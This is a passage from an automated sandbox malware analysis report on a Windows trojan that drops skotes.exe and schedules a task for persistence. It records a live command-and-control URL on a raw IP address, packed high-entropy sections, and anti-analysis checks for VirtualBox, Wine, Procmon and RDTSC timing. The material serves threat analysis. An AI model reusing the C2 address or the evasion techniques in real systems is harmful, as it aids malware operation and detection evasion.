                    Source: skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpj
                    Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                    Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded_9
                    Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp
                    Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpt9
                    Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNm

                    System Summary

                    barindex
                    Source: msqT9atzYW.exeStatic PE information: section name:
                    Source: msqT9atzYW.exeStatic PE information: section name: .idata
                    Source: msqT9atzYW.exeStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FA78BB7_2_00FA78BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FA88607_2_00FA8860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FA70497_2_00FA7049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00F64DE07_2_00F64DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FA31A87_2_00FA31A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00F6E5307_2_00F6E530
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FA2D107_2_00FA2D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FA779B7_2_00FA779B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00F64B307_2_00F64B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00F97F367_2_00F97F36
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe 4FEAE1EA40A074D042BA08876D3C459DDDCEFC9D4EAAD6A5A0709DD482E899DF
                    Source: msqT9atzYW.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: msqT9atzYW.exeStatic PE information: Section: ZLIB complexity 0.998414083787466
                    Source: msqT9atzYW.exeStatic PE information: Section: xwcxlzln ZLIB complexity 0.9951746323529411
                    Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.998414083787466
                    Source: skotes.exe.0.drStatic PE information: Section: xwcxlzln ZLIB complexity 0.9951746323529411
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: msqT9atzYW.exeReversingLabs: Detection: 57%
                    Source: msqT9atzYW.exeVirustotal: Detection: 52%
                    Source: msqT9atzYW.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeFile read: C:\Users\user\Desktop\msqT9atzYW.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\msqT9atzYW.exe "C:\Users\user\Desktop\msqT9atzYW.exe"
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: msqT9atzYW.exeStatic file information: File size 1996800 > 1048576
                    Source: msqT9atzYW.exeStatic PE information: Raw size of xwcxlzln is bigger than: 0x100000 < 0x1b5c00

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeUnpacked PE file: 0.2.msqT9atzYW.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 7.2.skotes.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: skotes.exe.0.drStatic PE information: real checksum: 0x1efeb5 should be: 0x1ebd33
                    Source: msqT9atzYW.exeStatic PE information: real checksum: 0x1efeb5 should be: 0x1ebd33
                    Source: msqT9atzYW.exeStatic PE information: section name:
                    Source: msqT9atzYW.exeStatic PE information: section name: .idata
                    Source: msqT9atzYW.exeStatic PE information: section name:
                    Source: msqT9atzYW.exeStatic PE information: section name: xwcxlzln
                    Source: msqT9atzYW.exeStatic PE information: section name: gxotezyq
                    Source: msqT9atzYW.exeStatic PE information: section name: .taggant
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: xwcxlzln
                    Source: skotes.exe.0.drStatic PE information: section name: gxotezyq
                    Source: skotes.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00F7D91C push ecx; ret 7_2_00F7D92F
                    Source: msqT9atzYW.exeStatic PE information: section name: entropy: 7.987683787433311
                    Source: msqT9atzYW.exeStatic PE information: section name: xwcxlzln entropy: 7.954322884658926
                    Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.987683787433311
                    Source: skotes.exe.0.drStatic PE information: section name: xwcxlzln entropy: 7.954322884658926
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: C4EC1F second address: C4EC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: C4EC23 second address: C4EC31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDC629 second address: DDC633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop esi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDC633 second address: DDC65F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43C8AE008Ch 0x00000008 jmp 00007F43C8AE0080h 0x0000000d jg 00007F43C8AE0076h 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F43C8AE0076h 0x0000001b jnc 00007F43C8AE0076h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDC65F second address: DDC665 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDB5F0 second address: DDB5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDB787 second address: DDB78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDB78B second address: DDB794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDB909 second address: DDB90D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDB90D second address: DDB913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDB913 second address: DDB922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F43C9098CE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDBA8A second address: DDBA8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDBA8E second address: DDBA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDBBF6 second address: DDBC19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 jne 00007F43C8AE0082h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDBC19 second address: DDBC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDBD97 second address: DDBDD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0082h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F43C8AE0076h 0x00000012 jmp 00007F43C8AE0088h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDBDD1 second address: DDBDE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43C9098CEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDBDE5 second address: DDBDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F43C8AE0076h 0x0000000c jnc 00007F43C8AE0076h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDEE34 second address: DDEE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDEE38 second address: DDEE42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F43C8AE0076h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDEEDF second address: DDEF0C instructions: 0x00000000 rdtsc 0x00000002 js 00007F43C9098CECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 js 00007F43C9098CE6h 0x00000017 jo 00007F43C9098CE6h 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push edi 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDEF0C second address: DDEF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 jns 00007F43C8AE0096h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43C8AE0088h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDEF34 second address: DDEFA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a js 00007F43C9098CEEh 0x00000010 pop eax 0x00000011 jne 00007F43C9098CECh 0x00000017 push 00000003h 0x00000019 movsx edx, cx 0x0000001c push 00000000h 0x0000001e or edi, 5B02A242h 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F43C9098CE8h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 00000015h 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 and di, 944Fh 0x00000045 push 70C650F8h 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F43C9098CF8h 0x00000051 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDEFA9 second address: DDEFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDF087 second address: DDF08D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DDF08D second address: DDF091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
